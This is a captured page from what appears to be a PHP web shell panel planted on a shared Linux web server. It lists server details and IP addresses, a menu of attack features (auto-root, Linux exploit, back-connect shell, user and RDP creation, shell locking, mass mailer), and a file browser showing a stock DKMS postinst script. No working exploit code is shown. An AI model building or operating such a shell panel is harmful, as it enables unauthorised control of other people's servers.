Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
debhelper /
autoscripts /
[ HOME SHELL ]
Name
Size
Permission
Action
postinst-dkms
826
B
-rw-r--r--
postinst-tex
286
B
-rw-r--r--
postinst-xmlcatalog
60
B
-rw-r--r--
postrm-tex
861
B
-rw-r--r--
postrm-xmlcatalog
68
B
-rw-r--r--
prerm-dkms
247
B
-rw-r--r--
prerm-xmlcatalog
81
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : postinst-dkms
# The original file can be found in template-dkms-mkdeb/debian/postinst # in the DKMS tarball, check it for copyright notices. DKMS_NAME=#MODULE_NAME# DKMS_PACKAGE_NAME=$DKMS_NAME-dkms DKMS_VERSION=#MODULE_VERSION# postinst_found=0 case "$1" in configure) for DKMS_POSTINST in /usr/lib/dkms/common.postinst /usr/share/$DKMS_PACKAGE_NAME/postinst; do if [ -f $DKMS_POSTINST ]; then $DKMS_POSTINST $DKMS_NAME $DKMS_VERSION /usr/share/$DKMS_PACKAGE_NAME "" $2 postinst_found=1 break fi done if [ "$postinst_found" -eq 0 ]; then echo "ERROR: DKMS version is too old and $DKMS_PACKAGE_NAME was not" echo "built with legacy DKMS support." echo "You must either rebuild $DKMS_PACKAGE_NAME with legacy postinst" echo "support or upgrade DKMS to a more current version." exit 1 fi ;; esac
Close